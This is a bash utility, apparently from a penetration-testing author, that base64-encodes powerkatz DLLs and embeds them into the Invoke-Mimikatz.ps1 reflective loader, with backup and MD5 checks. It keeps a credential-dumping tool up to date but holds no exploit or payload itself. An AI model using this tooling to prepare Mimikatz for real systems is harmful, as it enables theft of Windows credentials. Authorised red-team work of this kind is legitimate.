set -e
ESC_SEQ="\033["
COL_RESET=$ESC_SEQ"0m"
COL_RED=$ESC_SEQ"31;01m"
COL_GREEN=$ESC_SEQ"32;01m"
COL_BLUE=$ESC_SEQ"34;01m"
COL_MAGENTA=$ESC_SEQ"35;01m"
#Attempt to backup the powershell script in the event that I break it
backup() {

#Name of the backup copy: the script path with .bak appended
FILENAME="${MKATZ_FILE}.bak"
#does the powershell script exist and have we already made a backup?
if [[ -e $MKATZ_FILE && ! -e $FILENAME ]]; then

#make a backup since we haven't already
        cp $MKATZ_FILE $FILENAME 
	echo -e "[*] Backup saved to $FILENAME" 
	return 0
fi
#No powershell no washey  Either typo or can't follow directions
if [[ ! -e $MKATZ_FILE ]]; then
        echo -e "$COL_RED[-] Could not find powershell script. please make sure it's correct in the command line.$COL_RESET"
        return 1
fi
#Do we already have a backup?
if [[ -e $FILENAME ]]; then
	#We don't make another backup because of the potential to overwrite a good backup with garbage
        echo -e "[*] Looks like a backup has already been made. moving on"
		return 0
fi
}


#This is the meat and potatoes of the script
update() {
#Here we grab just the base64 strings and line number in an array from the ps1 for each arch
#This part was a pain in the ass to write so I hope this is appreciated.
#lessons learned while slaving away on this:
#The base64 strings are too large to be handled with sed as a normal variable.
#What I had to do was stream the file contents and then redirect the stdout to an awk session using heredoc. 

#Trust but verify.  Do we have the correct files?
if [[ -e $MKATZ_FILE ]]; then
	if  [ $(grep -c 'PEBytes64 = \"' $MKATZ_FILE) -ne 0 ]; then
		#Looks like a valid invoke PE script. Fuck it, let's fly!
		
		#Were we given valid DLLs? Use file mime-type for best guess
		if  [[ $(file --mime-type $PKATZ64 | rev | cut -d ' ' -f 1 | rev) == application/x-dosexec  &&  $(file --mime-type $PKATZ32 | rev | cut -d ' ' -f 1 | rev) == application/x-dosexec ]]; then
			#both the dll files match their expected mime types.  We can proceed
			echo -e "$COL_GREEN[+] $PKATZ64 and $PKATZ32 appear to be the proper file type.$COL_RESET"
		else
			echo -e "$COL_RED[-] Unable to process given files. Please check spelling and proper file type and try again.$COL_RESET"; exit 1 
		fi
	else
		echo -e "$COL_RED[-] Unable to validate $MKATZ_FILE as a proper PE reflection script. Please try again.$COL_RESET"; exit 1
	fi
else
	echo -e "$COL_RED[-] Unable to find $MKATZ_FILE. Please verify the location and try again $COL_RESET"; exit 1
fi	
		
		

#
#We use two for loops to run through both ARCHs here
#THIS IS WHERE THE NEW INFORMATION GETS POPULATED FROM THE DLLS AND ADDED TO THE POWERSHELL FILE
#


#The if statement could likely be shortened, but for right now it works as is.
for a in $(seq 0 1); do
	if [ $a == 0 ]; then
		echo -e "[*] Updating the 64 bit library"
		ARCH=""
		ARCH="64"
		PKATZ="$PKATZ64"
		LINE[$a]=`grep -n "PEBytes64 = \"" $MKATZ_FILE | cut -d ':' -f 1`
		OLDKATZ[$a]=`grep "PEBytes64 = \"" $MKATZ_FILE | cut -d ':' -f 1 | tr -d '"'`
	else
		echo -e "[*] Updating the 32 bit library"
		PKATZ="$PKATZ32"
		ARCH=""
		ARCH="32"
		OLDKATZ[$a]=`grep "PEBytes32 = \"" $MKATZ_FILE | cut -d ':' -f 1 | tr -d '"'`
		LINE[$a]=`grep -n "PEBytes32 = \"" $MKATZ_FILE | cut -d ':' -f -1`
	fi
############################################################################
#
#This section is where the base64 strings created from the DLL files are added to the powershell
#the OUTPUT variable holds the base64 encoding the 64bit payload and then 32.
#md5sums are created to ensure consistency and verifiable source. This feature will be 
#added in the future.  Right now it's good for error checking though.
#
#As it just so happens, we cannot just stuff the new file in to the powershell script. The base64 string
#is waaaaay too long.  Therefore we will read 1024 charcters at a time.
#######################################################################################################
		
	#OUTPUT will be the stream variable that we pipe back to the while loop
	OUTPUT=`base64 -w 0 $PKATZ`
	
	#get md5sum for error checking
	NEWMD5=`md5sum <<< $OUTPUT`
	NEWMD5=`echo $NEWMD5 | cut -d ' ' -f 1`
	
	#Token to mark beginning of the file 
	w=0;

	#while loop to stream $OUTPUT from the base64 conversion of the powerkatz.dll file
	#Awk sucks but I couldn't stream the string through sed because it exceeds the kernel's ARG_MAX value
	while read -r -n 1024 char; do
		if [[ $w == 0 ]]; then
			w=1
			awk -i inplace 'BEGIN{FS=OFS="\""} {if (NR == "'${LINE[$a]}'")  {$2="'$char'"} print $0;}' $MKATZ_FILE
		else
			awk -i inplace 'BEGIN{FS=OFS="\""} {if (NR == "'${LINE[$a]}'") {$2=$2"'$char'"} print $0;}' $MKATZ_FILE
		fi	
		done <<< $OUTPUT

	#grab the base64 string from the mimikatz file.  It should be different now.
	NEWHASH=`grep "PEBytes$ARCH = \"" $MKATZ_FILE | cut -d '"' -f 2 | tr -d '"'`
	#Get the md5sum of base64 string now in the powershell
	NEWSUM=`md5sum <<< $NEWHASH`
	NEWSUM=`echo $NEWSUM | cut -d ' ' -f 1`
	#md5sum checking 
	echo -e "[*] MD5 of the base64 string for x$ARCH in the $MKATZ_FILE is $NEWSUM"
	echo -e "[*] The new md5 of base64 string from the powerkatz dll is $NEWMD5"
	if [[ $NEWSUM !=  $NEWMD5 ]]; then 
		#Plain echo: piping the message into 'read' swallowed it and paused nothing
		echo -e  "$COL_RED[-]***MD5sums Do NOT Match***$COL_RESET"
		#echo "NEWSUM content length is ${#NEWSUM}" > ./error
		#echo "NEWMD5 content length is ${#NEWMD5}" >> ./error 
		echo -e "$COL_RED[-] Something went wrong with the upgrade\n$COL_RESET"
		cp $FILENAME $MKATZ_FILE 
		x=1 #shit's not right.  These sums should match
	else
		echo -e "$COL_GREEN[+] Library for "$ARCH"bit Mimikatz passed MD5 check$COL_RESET"
	fi

done
if [ $x == 0 ]; then 
	return 0 
else
	return 1
fi	
}

#just making things pretty
#usage menu:
show_parms() {
		echo -e "\n\n$COL_BLUE\tRTFM for Update_Mimikatz.sh$COL_RESET\n"
		printf "\t Usage: $0 [args] \n\n"
		printf "\t-ps1  > Invoke-Mimikatz.ps1 file\n"
		printf "\t-x64  > powerkatz_x64.dll file\n"
		printf "\t-x32  > powerkatz_x32.dll file \n"
		printf "Command example:\n"
		printf "#$0 -ps1 ./Invoke-Mimikatz.ps1 -x64 ./powerkatz_x64.dll -x32 ./powerkatz_x32.dll\n\n\n"
}

##########################################
#main subroutine
x=0
#If we don't have everything submitted, then RTFM
if [ $# -lt 6 ]
then
	show_parms
        exit
fi

VARS=`echo "$*" | sed 's/ [^ ]*$//'`
while [ $# -gt 1 ] ; do
        
	case $1 in
	-ps1|--ps1)
		#move to the next in line
		shift
		MKATZ_FILE="$1"
		;;
	-x64|--x64)
		#move to next in line
		shift
		PKATZ64="$1"
		;;
	-x32|--x32)
		#move to next in line
		shift
		PKATZ32="$1"
		;;
	*)
		show_parms
		exit 1
		;;
	esac
	shift
done

#backup() signals success with its exit status, so test the function call directly
if backup; then
	echo -e  "$COL_GREEN[+] Proceeding with the update...$COL_RESET"
	#update() likewise returns 0 on success and 1 when an MD5 check failed
	if update; then
		echo -e "$COL_BLUE[!] Script completed successfully.  Happy Hacking!$COL_RESET"
		exit 0
	else
		show_parms
		echo -e "$COL_RED[-]Something went wrong with the update. Try again later.$COL_RESET"
		exit 1
	fi
else 	
	show_parms
	echo -e "$COL_RED[-]Unable to backup the script.  Cannot continue until we have a backup.$COL_RESET"
	exit 1
fi
echo -e "$COL_RED[!!]There's no way we should be here.  You must be a wizard Harry!$COL_RESET"
exit 1337

Source : https://github.com/Graph-X
